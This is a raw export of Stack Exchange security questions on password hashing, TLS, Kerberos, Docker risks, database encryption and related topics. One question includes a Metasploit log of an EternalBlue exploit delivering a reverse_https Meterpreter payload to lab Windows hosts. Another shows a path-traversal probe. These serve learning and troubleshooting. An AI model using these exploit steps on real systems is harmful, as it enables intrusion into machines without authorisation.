There must be a handy way to securely store, say, GCP key.json somewhere on my machine and access it whenever I'm deploying stuff. Backup to cloud is a must. The Apple's Keychain access seems troublesome. Is there a better solution?

+",141727,,,,,1/7/2020 13:52,How do I securely store credentials and key files on my mac?,,2,3,,,,CC BY-SA 4.0 +223801,1,,,1/7/2020 9:22,,4,655,"

Proprietary software developed by a (smallish) company is stored in the company's GitHub private repository. For work, software engineers are requested to create company-specific GitHub account bound to their work email address.

+ +

But access to the private repository can be granted or revoked independently from the ""account origin"". What can be the risks of using personal (i.e. associated with an email which is not related to the company) GitHub account by developers?

+ +

Edit: I see one potential risk: if the account is used also for other things than work, its SSH key is likely to be saved also in places where these ""other things"" are done. This is a potential threat to work repositories; with a dedicated account, it's easier for the developer to keep the key(s) only in work-related (maybe controlled) environments.

+ +

Are there any other specific risks?

+",50647,,50647,,1/7/2020 10:26,1/7/2020 10:26,Risks of allowing employees using personal GitHub accounts for work,,1,1,,,,CC BY-SA 4.0 +223805,1,,,1/7/2020 9:49,,2,959,"

I've decided to use Argon2id for storing users' passwords in my database. +I have two questions:

+ +
    +
  1. Because there are several input parameters (parallelism, iterations etc.) that can influence the output result so I'm wondering if it's a good idea to store those parameters in the database e.g. in a column next to the stored passwords. Can it decrease somehow the security?
  2. +
  3. Because the users who use our application can have a different computer (our application is running on their side, it's a windows app) thus also a different computing power. How to correct set those parameters so it is secure enough but not too slow for users? Is there any recommended settings? Or the best way would be to run a performance test before a first run of the app and choose the parameters according to that (e.g. a goal is that the calculation of the hash password has to bee between 300-500 ms)
  4. +
+",224565,,98538,,1/7/2020 10:17,2/6/2020 11:01,Storing Argon2id parameters in a database?,,1,5,1,,,CC BY-SA 4.0 +223813,1,223815,,1/7/2020 13:06,,3,157,"

I have been using LastPass for a while and I have just seen an option to generate an exposure report. By its output, I assume it checks various sources containing credentials dumps from hacked web applications for matches to my username / e-mail.

+ +

The output looks like the following:

+ +
{date 1}
+somedomain.com
+
+{date 2}
+some collection name
+
+{date 3}
+Unknown source
+
+ +

I am curious about how such applications work behind the scene. Also, is there a way to find out more about my exposed e-mail in such dumps (i.e. more sources).

+ +

I see that haveibeenpwned.com lists many breaches, so I could consume their API to validate against my known hostnames. As a side note, somedomain.com is not listed by Pwned websites.

+ +

Question: How do applications such as password managers check leaked credentials and how can I get more results?

+",164712,,164712,,1/7/2020 13:14,1/7/2020 14:34,How do applications such as password managers check leaked credentials and how can I get more results?,,1,0,,,,CC BY-SA 4.0 +223817,1,,,1/7/2020 13:59,,2,128,"

A company has several remote branch offices located in relatively dangerous places, such as Iraq, and I'm looking into strategies to secure the SAN in the event of theft or looting. The data is commercially sensitive and contains intellectual property. Some of these offices are mobile, moving locations every couple of months.

+ +

Basically, the goals are:

+ +
    +
  1. Prevent data from the SAN falling into the hands of others
  2. +
  3. Prevent the destruction of data
  4. +
+ +

Each site has:

+ +
    +
  • A VPN, providing access to a central data centre in the USA (over a satellite link, sometimes as low as 4MB/s)
  • +
  • A local, highly-available ESXi cluster (note the vCentre server is located in a central data centre in Europe)
  • +
  • Virtual SAN storage (using StorMagic)
  • +
  • No local backups; backups are done remotely to a central data centre in Europe. The satellite links are often slow, and sites can sometimes be without access for several hours
  • +
+ +

At present, no data is encrypted - for this question, that's what I want to focus on.

+ +

Do you have any suggestions? Should we encrypt at the SAN level, the vSphere level, the OS level? How should keys be managed?

+",224584,,224584,,1/7/2020 14:37,1/7/2020 18:37,Strategies to protect SANs in branch offices in risky places,,1,3,,,,CC BY-SA 4.0 +223818,1,,,1/7/2020 14:24,,2,132,"

We are currently trying to enhance the security posture of our company, and this means changing how some IT personnel work.

+ +

Put precisely, our IT helpdesk currently have 2 separate accounts: 1 for normal day-to-day usage (mails, internet, etc...), and 1 for administrative tasks. The latter is a privileged account having several rights on the AD and some servers.

+ +

The way they work is not very secure when it comes to supporting the users: they use their privileged account to login to the user's workstation and perform tasks where admin rights are needed.

+ +

But my question is more accurately related to network drives being mapped in their privileged account's profile. They insisted on using the same logon script as with their standard account.

+ +

Do you have any recommendations, references to guidelines, and/or best practices in such a case? I'd like to present them some resources to convince them it's not secure to have network drives mapped in this profile.

+ +

I tried to explain to them that if they log in a 'contaminated' workstation, their privileges might spread the infection to the network... But they did not understand and argued they need to access some files on the network while assisting the users. They don't want to waste time typing UNC path, etc...

+",219676,,129883,,1/8/2020 7:35,1/8/2020 7:35,Best practices or advice to convince IT admins not to map network drives in privileged sessions with users,,0,7,,,,CC BY-SA 4.0 +223819,1,223824,,1/7/2020 15:38,,0,283,"

Recently, we migrated from Windows 7 to Windows 10 and during that migration, we progressively ran into some issues with our NAS device. To be more precise, we progressively noticed some tcp socket flooding on it while client computers were upgraded to Windows 10. We suspect that our NAS has some difficulties with NTLM, but this is out of this question scope.

+ +

Our NAS has a FQDN : filesvr1234.prod.company

+ +

We also have a DNS alias pointing to that FQDN : prodfiles.company

+ +

Kerberos authentication is enabled on filesvr1234.prod.company, but not on the alias prodfiles.company because we have some legacy apps that need NTLM.

+ +

We investigated on those issues by running WireShark while trying to read a file from a samba share on our NAS \prodfiles.company\shared\test.txt.

+ +

We observed the following behaviour. +Both Windows 7 and Windows 10 try first to authenticate using Kerberos.

+ +

Windows 10 will try authenticate using the alias prodfiles.company (which is the expected behaviour because we access the share with \prodfiles.company\shared\test.txt). It will use NTLM. However, we noticed that Windows 7 uses the FQDN (filesvr1234.prod.company) instead of the DNS alias, even if we access the share using the alias (\prodfiles.company\shared\test.txt). It will use Kerberos.

+ +

To see this, we looked at ""SNameString"" in KRB5 packets (Wireshark). +To summarize : +We read a file in \prodfiles.company\shared\test.txt +Windows 7 use filesvr1234.prod.company even if we access the share using prodfiles.company. +Windows 10 use prodfiles.company

+ +

Does something changed between Windows 7 and Windows 10 that makes the authentication process to use the DNS alias instead of the FQDN ?

+",178974,,,,,1/7/2020 17:42,Does Kerberos authentication handle DNS names the same way between Windows 7 and Windows 10?,,1,0,,,,CC BY-SA 4.0 +223820,1,,,1/7/2020 16:18,,1,138,"

I received a message with the famous link My-love co via Whatsapp and I never clicked on the link; I blocked the contact and deleted the message containing it; such a link was reported as infected by the newspapers.

+ +

Despite the fact that I didn't click on it, a strange icon with the profile picture and the name of the person who sent it to me appeared in my home. I reset my phone then and reinstalled WhatsApp by recovering the backup of the chats.

+ +

No traces of the infected link in there (because I deleted the message before resetting the phone), so I was no longer worried about it and I sent a message to the contact. +After that, I blocked him again to avoid the possibility of other infected messages.

+ +

Today that strange icon with his name and profile picture appears again on my home. I cannot find it in the APPs list.

+ +

I never clicked on any link and I did hardware reset, so my questions is:

+ +

Why such a virus is there and why it's still there even after the hardware reset? Is it possible that the infected Whatsapp account is able to spread the trojan simply by being there in the contact list of my phone or because I opened his message (even if I didn't click on the link)? Or might my SIM card be virus-infected instead?

+",96606,,96606,,1/7/2020 16:21,1/7/2020 16:21,How I rescue my Android from a trojan and how did I get it?,,0,7,,1/7/2020 16:20,,CC BY-SA 4.0 +223822,1,,,1/7/2020 17:02,,1,130,"

The a=crypto attribute in RFC 4568 has a separate section 9.2. for SRTP "Crypto" Attribute Grammar. What it basically includes is a list of attribute values required for encrypting media (crypto suite, method, session params, keys, MKI...).

+

However, DTLS-SRTP also does the same (RFC 5764 - SRTP Extension for DTLS). So, is it correct to say that where DTLS-SRTP is used, the a=crypto: attribute is not used. For example, does webRTC offer-answer SDP use the "a=crypto:" attribute as DTLS-SRTP is a must for webRTC?

+

Informational RFC "SDP for webRTC" also does not throw any light on this issue.

+

Please clarify.

+",221573,,-1,,10/7/2021 7:24,1/7/2020 17:02,Is the SDP a=crypto attribute relevant when DTLS-SRTP is used?,,0,0,,,,CC BY-SA 4.0 +223825,1,223835,,1/7/2020 17:50,,1,167,"

I am a junior web developer. All I know is mostly about web development. I have no skills and knowledge about system security and know little about Linux.

+ +

I work in a company which is developing some embedded product. In the R&D department, some developers built a build-server for development. They make our own Docker image and run Docker, including CI/CD and Gitlab service, in this server.

+ +

This build-server connects with our AD server. Our developer could add his own public Key to this server and then remotely log in to this server with SSH and doing development in this server. We call it DevOps.

+ +

This server only works in our company's intranet or VPN, not open for public Internet.

+ +

The above is all background information.

+ +
+ +

A few months ago I read some IT security blogs about Docker security issues. It says that because the architecture of Docker is different from traditional VM, if the Docker image is backdoored, then the whole system will be easily hacked.

+ +

If I suppose that the person who built this build-server is not a good guy, and he backdoored the Docker images, is it possible that my account in this build-server could be hacked or usurped?

+ +

I mean even I use the public key and SSH login, without typing the password manually. Does this risk still exist?

+ +

Second question: if the first question above is TRUE, what could I do to protect my self?

+ +

I mean, if the bad guy usurped my account and did something bad thing (for example, leaking development codebase of company using my account or doing other attacks using my account), how could I prove I am innocent?

+ +

I can not discuss these suspicions thinking with my colleague because I have no evidence about those things. I just worry about these becoming true, so I want to do something to prevent, just in case. I also have no authorization to check or validate the server.

+ +

What could I do? Backup my login logs of my laptop periodically? (But it seems irrelevant to the build-server.)

+",224599,,129883,,1/7/2020 19:53,1/7/2020 21:39,Risk of Docker backdoor allowing impersonation,,1,1,1,,,CC BY-SA 4.0 +223827,1,223843,,1/7/2020 18:24,,3,212,"

I am completely new to cryptography but have been trying to make myself familiar with the concepts and applications. I have a project where I believe cryptography to be beneficial.

+ +

Project Info:

+ +

DB = MySQL 5.6

+ +

Engine = InnoDB

+ +

My application will reside on an intranet web server behind a network firewall with a very small white-list. Few users of this application will have the ability to add/remove values from the database. A larger number of users would be able to read these values. Values I would hope to encrypt could include:

+ +
    +
  • emails
  • +
  • account numbers
  • +
  • paths
  • +
  • dates
  • +
  • unique ids
  • +
+ +

Largest table(s) would have up to 150k entries and total sessions likely to remain under 100.

+ +

Being an intranet site I assume (with limited security knowledge) that my primary threats will be malicious users, hardware theft, and persistent XSS from an internal or external source. I am doing my best to mitigate all of these.

+ +

Doing some research on how to encrypt my data while allowing it to be searchable leaves me with a few options (please correct wrong information);

+ +
    +
  • CipherSweet Blind Indexing: requires library, may be overkill, false positives possible
  • +
  • MySQL AES_ENCRYPT/DECRYPT: if logs are compromised plaintext values will also be compromised
  • +
  • Application Side: runtime ""nightmare"", heavy load, could cause issues with multiple threads running
  • +
+ +

Questions

+ +
    +
  1. While ugly and poor practice should application side encryption/decryption be acceptable for my environment?
  2. +
  3. Would the likelihood of false positives with CipherSweet be negligible for my datasets?
  4. +
  5. Given my environment, would letting MySQL handle the encryption/decryption be acceptable (neglecting hardware theft or server compromise)
  6. +
  7. Bonus - should I be worrying about external XSS given my environment
  8. +
+ +

I understand this question may fall into the category of discussion and if that is the case please direct me to where I may find further information to narrow my questions.

+ +

EDIT

+ +

I am now also exploring the possibilities of using CryptDB or TDE.

+ +

EDIT 2

+ +

I am working with MySQL Community Edition so it seems TDE will not be available to me unless there is a way to specifically acquire only this feature. Continuing to research other options. Any information is appreciated.

+ +

EDIT 3 +For my OS I dont think I will be able to use CryptDB as in its docs it says:

+ +
+
    +
  • Requirements: > Ubuntu 12.04, 13.04; Not tested on a different OS.
  • +
+
+",223054,,223054,,5/18/2020 19:29,5/18/2020 19:29,Database Security - Encryption & Searching,,1,2,,,,CC BY-SA 4.0 +223838,1,223882,,1/7/2020 21:53,,2,328,"

I have almost 0 knowledge of IoT, their protocols and usual device constraints. I had a discussion today with someone that has a fair amount of IoT experience and we were discussing some security related issues and the establishment of a shared key came up. I assumed that Diffie-Hellman would be used but this person seemed to not be familiar with the method and based on their knowledge for low power devices, the keys are actually preloaded inside.

+ +
    +
  1. Is this a real scenario?
  2. +
  3. Is it possible for DH exchange to be too intensive for a low powered device?
  4. +
  5. What role does Ephemeral Diffie–Hellman Over COSE (EDHOC) play in this case? Is it a good alternative or still problematic?
  6. +
+",146090,,146090,,1/8/2020 13:04,1/8/2020 22:07,Using Diffie-Hellman exchange on low power IoT devices,,2,3,,,,CC BY-SA 4.0 +223845,1,223846,,1/8/2020 1:21,,3,199,"

I am unsure about how extensions are handled in TLS v1.2.

+

During the handshake, the client is able to add some extensions during ClientHello. As far I understood, the server can pick arbitrary subsets from this list in ServerHello similar to picking the cipher suite, which the client provided during ClientHello. Is this correct?

+

If not, is it that the server can either take all those extensions into account, or must abort the handshake? I am not sure which is true.

+

I was looking for an adequate answer here in RFC5246, but didn't really find the one statement I am looking for.

+",209776,,-1,,10/7/2021 7:59,1/8/2020 2:05,TLS 1.2 Handshake: Does the server have to take all extensions sent by the Client?,,1,1,,,,CC BY-SA 4.0 +223848,1,,,1/8/2020 5:17,,1,318,"

I'm developing a solution for secure chat over instant messaging, here is the scenario:

+ +

I need to encrypt my message then send it on {Whatsapp, telegram, Wechat,...}, I don't trust any software above, so I use an app on my cellphone to encrypt/decrypt messages, basically it works like a translator.

+ +

However, the first idea turns to be naive, because it's really hard to ensure the cellphone itself not to be hacked, for example, the clipboard.

+ +

Therefore the current idea is, to use a dedicated cellphone to encrypt and decrypt message, and it transmit/receive messages with my cellphone (the one runs IM apps) over Bluetooth. The goal is to isolate the hardware that possibly contacts the original text, so my cellphone can only read the encrypted messages.

+ +

Is Bluetooth here a good solution?

+ +

The following picture shows the rough idea. Phone A-1 and B1 should install only the encryption apps, and stay offline for any kinds of connections except the Bluetooth connection with A-2 and B-2.

+ +

+",181725,,6253,,1/9/2020 8:45,1/9/2020 8:45,Is Bluetooth on cellphone a reliable protocol for encrypted text transmission?,,2,1,,,,CC BY-SA 4.0 +223853,1,,,1/8/2020 9:46,,1,87,"

Until about a year ago, I was working for one of the big tech giants. During my time there, I noticed that the IT department would do a MITM attack on any website that employees access. i.e. if you opened GMail and Facebook, and you'd click the lock button on Chrome, you'd see that the certificate is a custom certificate rather than GMail's or Facebook's certificates. They would install these certificates on all company laptops, so effectively they had the ability to read and modify any website you'd access.

+ +

So far, pretty standard Big Brother stuff, right? I'd imagine that many big corporates in the US do the same.

+ +

I mentioned this to a colleague at lunch, and he said there's no way they would MITM any banking or other financial activity, because that would be illegal. After lunch, I tried to access the bank I use for my personal account, Bank HaPoalim, and indeed he was right. The certificate was Bank HaPoalim's, so my communication with them was secure.

+ +

This leads me to believe that big corporates have a list of ""banks we're not allowed to MITM"". I don't know whether they all share the same list, or each have their own. They might have the same for health-related information.

+ +

Now I have a client who runs a site that handles finanical information. They want to get in that list, so their customers would be able to access them without their employers sniffing their traffic.

+ +

My question is: Where is that list? How does one request to be added to it?

+",16116,,,,,1/8/2020 9:46,How to get on a list of sites that handle financial information?,,0,4,,1/8/2020 10:41,,CC BY-SA 4.0 +223854,1,,,1/8/2020 10:15,,1,135,"

I'm working on a flask application which requires some authentication but not on every endpoint. +I use this piece of code to exclude certain endpoints from my authentication handler.

+ +
if request.path in NO_AUTH_PATHS or (re.match(r'/dashboard/.*', request.path) is not None):
+        return None
+
+ +

I then though what would happen if i were to make a call to +https://<site_domain>/dashboard/../<restricted_path>

+ +

Fortunately I got an authentication error, and I made the call both via my browser (Firefox 71.0) and through curl v7.67. This leads me to believe that request.path is parsed as /<restricted_path> and not /dashboard/../<restricted_path>.

+ +

What I want to ask is where this parsing takes place? If it's done by curl and Firefox before forwarding the request, this method might be a huge security issue.

+",199237,,,,,1/8/2020 10:15,Circumventing authentication by relative path in flask,,0,5,,,,CC BY-SA 4.0 +223856,1,,,1/8/2020 10:24,,0,82,"

I have installed a VPN on my computer via OpenVPN and a vpnbook.com French server. When activated, IP sites correctly locate me in France (I am currently on holiday in another European country), yet some websites will still ""guess"" that I am not actually in France. One specific case is a TV replay website that will tell me that the content is not available in my country.

+ +

What could be the reason behind such a guess? How does the target website identify that the traffic coming from a French server is not actually coming from France? Does it have this server identified as ""VPN"" and thus tagged as ""foreign""?

+",224633,,6253,,1/8/2020 10:42,1/8/2020 10:46,Possible reasons for an incorrect VPN geolocalization,,0,2,,1/8/2020 10:44,,CC BY-SA 4.0 +223858,1,,,1/8/2020 11:03,,2,1750,"

I was trying to practice with meterpreter, so I used the overflow ms17_010_eternalblue and as a payload windows/meterpreter/reverse_https but I am unable to make this payload to work properly.

+ +

1st target: win2008r2 (10.0.0.6)
+2nd target: win7 (10.0.0.7)

+ +

Both without firewall, AV, connectivity is LAN (same adapter) as the attacker (10.0.0.1).

+ +

I've properly set all options (rhosts, lhost, lport...).

+ +

On the win2008r2 it goes like this:

+ +
[*] Started HTTPS reverse handler on https://10.0.0.1:443
+[*] 10.0.0.6:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
+[+] 10.0.0.6:445- Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
+[*] 10.0.0.6:445- Scanned 1 of 1 hosts (100% complete)
+[*] 10.0.0.6:445 - Connecting to target for exploitation.
+[+] 10.0.0.6:445 - Connection established for exploitation.
+[+] 10.0.0.6:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.0.0.6:445 - CORE raw buffer dump (51 bytes)
+[*] 10.0.0.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
+[*] 10.0.0.6:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
+[*] 10.0.0.6:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
+[*] 10.0.0.6:445 - 0x00000030 6b 20 31 k 1
+[+] 10.0.0.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.0.0.6:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.0.0.6:445 - Sending all but last fragment of exploit packet
+[*] 10.0.0.6:445 - Starting non-paged pool grooming
+[+] 10.0.0.6:445 - Sending SMBv2 buffers
+[+] 10.0.0.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.0.0.6:445 - Sending final SMBv2 buffers.
+[*] 10.0.0.6:445 - Sending last fragment of exploit packet!
+[*] 10.0.0.6:445 - Receiving response from exploit packet
+[+] 10.0.0.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.0.0.6:445 - Sending egg to corrupted connection.
+[*] 10.0.0.6:445 - Triggering free of corrupted buffer.
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ +

It goes for 3 times then out. The host sometimes reboots, sometimes it won't. +Tried this same exploit with other payloads like cmd and reverse_http and it works fine...so maybe I'm missing something with https setup.

+ +

On the win7, the result is interesting but dissapointing:

+ +
[*] Started HTTPS reverse handler on https://10.0.0.1:443
+[*] 10.0.0.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
+[+] 10.0.0.7:445- Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
+[*] 10.0.0.7:445- Scanned 1 of 1 hosts (100% complete)
+[*] 10.0.0.7:445 - Connecting to target for exploitation.
+[+] 10.0.0.7:445 - Connection established for exploitation.
+[+] 10.0.0.7:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.0.0.7:445 - CORE raw buffer dump (38 bytes)
+[*] 10.0.0.7:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
+[*] 10.0.0.7:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
+[*] 10.0.0.7:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
+[+] 10.0.0.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.0.0.7:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.0.0.7:445 - Sending all but last fragment of exploit packet
+[*] 10.0.0.7:445 - Starting non-paged pool grooming
+[+] 10.0.0.7:445 - Sending SMBv2 buffers
+[+] 10.0.0.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.0.0.7:445 - Sending final SMBv2 buffers.
+[*] 10.0.0.7:445 - Sending last fragment of exploit packet!
+[*] 10.0.0.7:445 - Receiving response from exploit packet
+[+] 10.0.0.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.0.0.7:445 - Sending egg to corrupted connection.
+[*] 10.0.0.7:445 - Triggering free of corrupted buffer.
+[*] https://10.0.0.1:443 handling request from 10.0.0.7; (UUID: ym6hhk2d) Staging x64 payload (207449 bytes) ...
+[*] Meterpreter session 5 opened (10.0.0.1:443 -> 10.0.0.7:2350) at 2020-01-07 14:56:49 -0500
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ +

It goes on and on for 4 times until it finishes without ""working"" sessions. It does open them but if you interact with them, they are dead.

+ +

Also like on 2008, if I switch to reverse_tcp or http works just fine.

+ +

No encoders used.

+ +

Tried with both x86 and x64 payloads (in my short experience I've seen matching OS arch and payload does help but sometimes...)

+ +

Tried also with meterpreter/reverse_winhttps (because of WinInet and WinHTTP, but I didn't read deep on this so maybe I' m missing something there too).

+ +

Was also working with msfvenom and creating payloads to execute over these 2 systems.

+ +

Results were the following:

+ +

On the win2008r2 no matter what, I am unable to create a meterpreter session on attacker. +The exe runs fine, creates connection back to the attacker and even I see in the attacker box how it is receiving connections and answering back (I believe stages), but since msfconsole handler reports nothing I am a bit lost).

+ +

Tried the same setup with reverse_tcp and reverse_http payloads and both works fine, creating session and so.

+ +

On the win7, finally success with reverse_https. The payload generated with msfvenom is connecting back to attacker and creating the session.

+ +

Win7 also working with reverse_tcp and reverse_http payloads.

+ +

What am I missing about the https payload?

+ +
OS: Linux kali 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1
+
+Metasploit
+Framework: 5.0.66-dev
+Console : 5.0.66-dev
+
+ +

Summary:

+ +

reverse_https works only in Win7 when it is created with msfvenom and executed manually in the target machine. It won't work using it as a payload for a common exploit like eternalblue, launched from an attacker machine in metasploit.

+ +

For 2008, I can't make it work either from metasploit or with manual execution from the target machine.

+ +

What I am trying to get out of this is, is understanding why it is failing, if I am missing something regarding reverse_https payload or if it is a specific or known issue with reverse_https and win7/2008r2.

+ +

I have run a packet capture, with tcpdump and wireshark and I saw in attacker machine how it receives traffic from victim, and also how it sends back traffic to victim, communication is established and flowing but no session created in listener.

+",224639,,54284,,1/8/2020 21:04,1/8/2020 21:04,Help with meterpreter reverse https,,0,2,0,,,CC BY-SA 4.0 +223859,1,223862,,1/8/2020 11:25,,-1,269,"

Everyone says a computer virus replicates/attaches itself to another host file. This concept is not clear to me. I have read many articles but unable to understand how.

+ +

Say, virus V1 is the original virus. It has a payload saying ""Hello World"". +Two machines (M1 and M2) are available, each with 3 files. +At first, V1 is present on M1. It inserts payload within other 3 files. It can do so because the payload code is written within the virus V1. When files at M1 is executed, they display ""Hello World"".

+ +

How these infected files at M1 can infect files of M2?

+ +

How a virus can contain its own code (entire code) within itself?

+ +

It will be easy for me if anyone can address my question with an example or pseudo-code.

+",103202,,6253,,1/8/2020 11:45,1/8/2020 11:54,How a virus injects itself to another machine's file?,,1,10,,,,CC BY-SA 4.0 +223863,1,,,1/8/2020 12:23,,1,140,"

I am currently trying to solve an exercise where I should look at a TLS 1.2 handshake trace while having access to pre and both randoms (server random and client random).

+ +

In order to decrypt application data, I need to rebuild the master key.

+ +

But I am struggling with finding the section where it is negotiated how this master key is actually built from pre and randoms.

+ +

How does TLS 1.2 handle that? Is there maybe a default handling?

+",209776,,6253,,1/8/2020 12:30,1/23/2020 13:46,TLS 1.2. Handshake: Where do Client and Server negotiate how the master key is built from randoms and pre?,,1,6,,,,CC BY-SA 4.0 +223869,1,,,1/8/2020 15:23,,4,177,"

The site in question is the UK regulator for companies at https://ewf.companieshouse.gov.uk. Online access to a company on this site enables the user to file/change various critical things on behalf of the company including the name, address, owners, directors, annual accounts, etc. The public records that these generate are often relied upon by external institutions such as banks. A successful attacker can therefore potentially take over a company and its assets.

+ +

The security policy consists of this:

+ +
    +
  1. You first login to the site with a site account by supplying an email address and password. However, this should be considered irrelevant because any site account can proceed to step 2 - there is no correlation between site accounts and company accounts. To put it another way, step 1 can be bypassed by simply registering a new site account and logging in with that.
  2. +
  3. You then login to a company account by supplying a company number (which is publicly available information) and an authentication code. To reiterate, any site account can login to any company account. As far as I can tell, a site account serves no purpose other than to get you to the company account login screen.
  4. +
  5. The policy is somewhat opaque but as far as I can tell from experimenting, the authentication code consists of exactly 6 characters, and can only be made up of capital letters and numbers. This means there are 36^10 = 2,176,782,336 possible codes.
  6. +
  7. The initial authentication code is sent to the registered address of the company by snail mail.
  8. +
  9. The code can be changed, but a copy of the new code is again sent out by snail mail.
  10. +
+ +

Risks:

+ +
    +
  1. Poor password selection criteria.
  2. +
  3. Plaintext storage of the password.
  4. +
  5. Exposure of the password whilst in transit in the post.
  6. +
+ +

Further assumptions:

+ +
    +
  • Asking the regulator to change their policy is likely to be a waste of time (unless someone knows a legal route to force the issue).
  • +
  • The regulator is a monopoly so there is no possibility to take my ""business"" elsewhere.
  • +
  • It is possible to deregister an authentication code, but this is even less secure as the company can then be managed by post, with no security checks at all (i.e. the regulator will accept at face value anything it receives in the post). Having online access prevents this for certain types of filings.
  • +
+ +

Given the above, what steps should I take to mitigate the risks? My plan so far includes frequent code changes, checking the mail for signs of tampering, and shredding the letters upon receipt. On the other hand, I wonder if this may be a case where changing the code is more harmful than useful, as it increases the chances of it being exposed in the post.

+",17049,,78324,,4/7/2020 21:44,4/7/2020 21:44,How to mitigate insecure password policy that I am forced to use?,,0,7,,,,CC BY-SA 4.0 +223872,1,,,1/8/2020 18:06,,1,69,"

I'm using webcrypto, not PGP/GPG.

+ +

I would like to use a key pair to create a ""subkey"" that is authorized by my primary key in a way anyone can publicly verify so I don't need to expose the primary key's private component to any web-facing systems.

+ +

My idea is to:

+ +
    +
  • primary key signs a hash of subkeys public component
  • +
  • then use the subkeys private key (proving it has access) to encrypt this signed blob
  • +
+ +

Verification would be:

+ +
    +
  • use the subkey public key to decrypt the signature
  • +
  • use the primary key’s public to verify the signature.
  • +
+ +

Would this be safe? Do I need to ad any tamper protection (AHEAD/HMAC)? I'm interested in an answer for both ECC and RSA.

+",3927,,,,,1/8/2020 18:06,How to authorize a subkey using a primary master key pair?,,0,0,,,,CC BY-SA 4.0 +223873,1,223881,,1/8/2020 19:17,,21,7478,"

I am building a web site that provides user login. For that, I am currently researching good strategies for dealing with authentication.

+ +

How I'm doing it right now

+ +

My current concept is modeled after what seems to be the common consensus right now. Passwords are salted with 64 bytes from /dev/urandom and then hashed with 100 rounds of SHA-512. After every round, the original password is concatenated to the result and then fed into the next round. When a user wants to log in, they send their credentials to the server, where the described procedure is then repeated (using the same salt, obviously) and compared to the hash in the database.

+ +

This strategy seems adequately secure to me (please correct me if I'm wrong, it is basically just the result of reading a lot of online guides and watching YouTube videos). However, I think it has a major flaw, which is the client having to send the password in plain text to the server. Yes, I naturally use HTTPS, but still, if the connection was somehow compromised for whatever reason, so is the password.

+ +

The alternative concept

+ +

So I thought of an entirely different approach: using PGP keys. When a user signs up, they generate a PGP key pair, encrypt the private key using a password of their choice and send it to the server. When they want to log in again, the server generates a string of random characters and encrypts it using the public key. The encrypted random string and key pair are then sent to the client, who will need to decrypt it again to prove they have the private key's password.

+ +

This method would prevent the password from ever being transmitted over the network and even allow for cool stuff like end-to-end encrypted chat between users. The only drawback I could find is the server having to give out encrypted private keys to basically anyone who requests them, making brute-force attacks way easier. I could mitigate that by running a computationally expensive key expansion algorithm on the client side and use the result of that for encrypting the private key.

+ +

But I still don't really trust the whole thing, and so I would love to hear your feedback on whether this is a good idea or if I should just stick with how I'm doing it right now.

+ +

EDIT:

+ +

Based on some of the answers, I think my question is a little misleading. My requirement is that the only thing users ever need to provide for successful authentication is their username/password and nothing else, regardless of what device they are using or whether they were logged in on that device before.

+",224666,,224666,,1/9/2020 15:18,2/25/2021 21:37,Is PGP for user authentication a good idea?,,8,14,3,,,CC BY-SA 4.0 +223876,1,,,1/8/2020 20:31,,5,193,"

I manage an application that connects to various servers using a client-specific keypair. We have around 70 customers; all but one can connect to our FTP server (for SCP) after first accepting the RSA fingerprint (which hasn't changed in ~5 years).

+ +

To illustrate this behavior, I'm trying to SCP to the server every 15 minutes and dumping the result to /tmp/scp_(timestamp).log. The one client that can't connect was first presented with a round-robin of three different fingerprints:

+ +
$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c
+    129 14:4c:06:43:01:53:81:ef:b7:fd:09:46:91:06:c1:c9.
+     98 34:9c:3f:13:f5:c4:74:9c:bd:b0:ff:4e:63:aa:eb:4c.
+     97 36:dd:a7:90:4c:71:06:95:3c:e6:f3:ad:2a:96:c3:6a.
+
+ +

Recently, though, I started seeing truly random (to me, anyway) fingerprints:

+ +
$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c | head
+      1 02:5f:20:15:68:ea:0e:69:ef:7a:cc:1a:00:94:3f:96.
+      1 02:a0:62:65:bc:41:6b:35:cf:4c:c2:fc:66:72:d8:5a.
